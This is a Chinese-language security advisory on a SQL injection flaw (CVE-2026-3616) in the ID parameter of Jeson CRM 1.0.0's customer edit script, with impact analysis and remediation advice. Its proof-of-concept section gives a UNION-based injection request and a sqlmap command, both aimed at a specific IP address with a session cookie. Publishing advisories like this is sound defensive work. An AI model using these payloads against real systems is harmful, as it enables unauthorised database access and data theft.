首页 网络安全 正文
  • 本文约1879字,阅读需9分钟
  • 3
  • 0

Jeson CRM中的SQL注入漏洞CVE-2026-3616

摘要

栋科技漏洞库关注到 Jeson CRM 1.0.0 版本中存在的一个 SQL 注入漏洞,漏洞现已经被追踪为CVE-2026-3616,CVSS 3.X评分6.3。

Jeson Customer Relationship Management System(CRM)是基于 PHP 开发的客户关系管理系统,其基于原生 PHP + MySQL 开发。

一、基本情况

Jeson CRM 是个面向小微企业与初创团队的轻量级开源客户关系管理系统,界面简洁、功能聚焦,主打客户、产品、订单一体化管理。

Jeson CRM中的SQL注入漏洞CVE-2026-3616

Jeson CRM 基于原生 PHP + MySQL构建,无复杂框架依赖,部署与维护成本低,作为GitHub开源项目,支持二次开发、自定义扩展。

栋科技漏洞库关注到 Jeson CRM 1.0.0 版本中存在的一个 SQL 注入漏洞,漏洞现已经被追踪为CVE-2026-3616,CVSS 3.X评分6.3。

二、漏洞分析

CVE-2026-3616漏洞是在对 Jeson CRM 1.0.0 版本进行安全审查时,在该客户关系管理系统的管理模块中发现一处高危SQL注入漏洞。

该漏洞源于该系统在处理 `/modules/customers/edit.php` 脚本中的 `ID` 参数时,没有能进行充分的过滤、验证或使用参数化查询所致。

由于该应用程序在将该输入用于SQL查询前,未对其进行正确的过滤与校验,导致攻击者可篡改 SQL 语句,对数据库执行未授权操作。

远程攻击者可以通过构造恶意的 SQL 注入载荷并传递给 ID 参数,从而在服务器后台执行任意 SQL 指令,实现越权访问数据库等操作。

潜在风险包括数据库敏感信息泄露、数据篡改,甚至完全接管数据库服务器系统完整控制权,对系统安全与业务连续性构成严重威胁。

三、POC概念验证

1、POC代码

管理员已设置登录后刷新可查看

2、需要验证

利用漏洞需要先进行身份验证或事先访问系统。

以下是Burp Suite工具捕获数据包的截图。

GET /modules/customers/edit.php?id=1+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,CONCAT(0x717a766b71,0x75777765716e68754c6a456e6e6e41546a59546643444f776f61524165444150636a4a6662424d41,0x7162787a71),NULL,NULL,NULL-- HTTP/1.1
Host: 154.219.114.125:8088
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, p
Cookie: PHPSESSID=bbs4fv9sg2en9m7vmb9il0pu7a
Connection: keep-alive

Jeson CRM中的SQL注入漏洞CVE-2026-3616

3、以下是通过测试和运行sqlmap工具获得的一些特定管理人员的屏幕截图:

python sqlmap.py --random-agent --batch -u "http://154.219.114.125:8088/modules/customers/edit.php?id=1" --cookie "PHPSESSID=bbs4fv9sg2en9m7vmb9il0pu7a" --dbms=mysql --current-db

Jeson CRM中的SQL注入漏洞CVE-2026-3616

4、安全建议

(1)使用准备好的语句和参数绑定:

准备语句可以防止SQL注入,因为它们将SQL代码与用户输入数据分离。

使用预处理语句时,用户输入的值被视为纯数据,不会被解释为SQL代码。

(2)输入验证和筛选:

严格验证和过滤用户输入数据,以确保其符合预期格式。例如,确保被提名者ID与有效的数字模式匹配。

(3)最小化数据库用户权限:

确保用于连接到数据库的帐户具有所需的最小权限。避免使用具有高级权限(如“root”或“admin”)的帐户进行日常操作。

(4)定期安全审计:

定期进行代码和系统安全审计,以及时识别和修复潜在的安全漏洞。

四、影响范围

Jeson CRM <= 1.0.0

五、修复建议

Jeson CRM > 1.0.0

六、参考链接

管理员已设置登录后刷新可查看



扫描二维码,在手机上阅读
评论
更换验证码
友情链接